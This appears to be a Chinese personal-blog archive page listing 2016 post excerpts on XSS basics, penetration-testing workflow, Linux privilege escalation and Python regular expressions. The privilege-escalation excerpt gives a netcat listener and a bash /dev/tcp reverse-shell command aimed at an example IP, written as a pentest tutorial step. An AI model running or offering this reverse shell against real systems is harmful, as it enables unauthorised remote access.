会员
周边
新闻
博问
闪存
众包
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
请叫我美女sky
博客园
首页
新随笔
联系
管理
订阅
09 2016 档案
XSS 初识
摘要:xss(跨站脚本攻击)xss是指攻击者在网页中嵌入客户端脚本,通常是javascript编写的恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将在用户的浏览器上被解析执行。重点是“脚本”这两个字,脚本主要有javascript和actionscript。要想深入的研究xss,必须要精通
阅读全文
posted @
2016-09-28 10:14
请叫我美女sky
阅读(1151)
评论(0)
推荐(0)
针对企业级别渗透测试流程
摘要:
阅读全文
posted @
2016-09-05 11:10
请叫我美女sky
阅读(348)
评论(0)
推荐(0)
Linux下漏洞提权
摘要:Linux下的漏洞提权 linux下一般都是系统漏洞提权,分为以下几个步骤: 提权 反弹shell 本地:nc -l -p 8000 目标机器:/bin/bash -i >& /dev/tcp/10.10.10.10/8000 0>&1 实例 1、得到系统版本号 centos 7 local roo
阅读全文
posted @
2016-09-02 18:06
请叫我美女sky
阅读(493)
评论(0)
推荐(0)
Python 正则表达式
摘要:正则表达式 字符串是编程时涉及到的最多的一种数据结构,对字符串进行操作的需求几乎无处不在。比如判断一个字符串是否是合法的Email地址,虽然可以编程提取@前后的子串,再分别判断是否是但粗和域名,但这样做不但麻烦,而且代码难以复用。 正则表达式是一种用来匹配字符串的强有力的武器。它的设计思想是用一种描
阅读全文
posted @
2016-09-01 17:28
请叫我美女sky
阅读(246)
评论(0)
推荐(0)
公告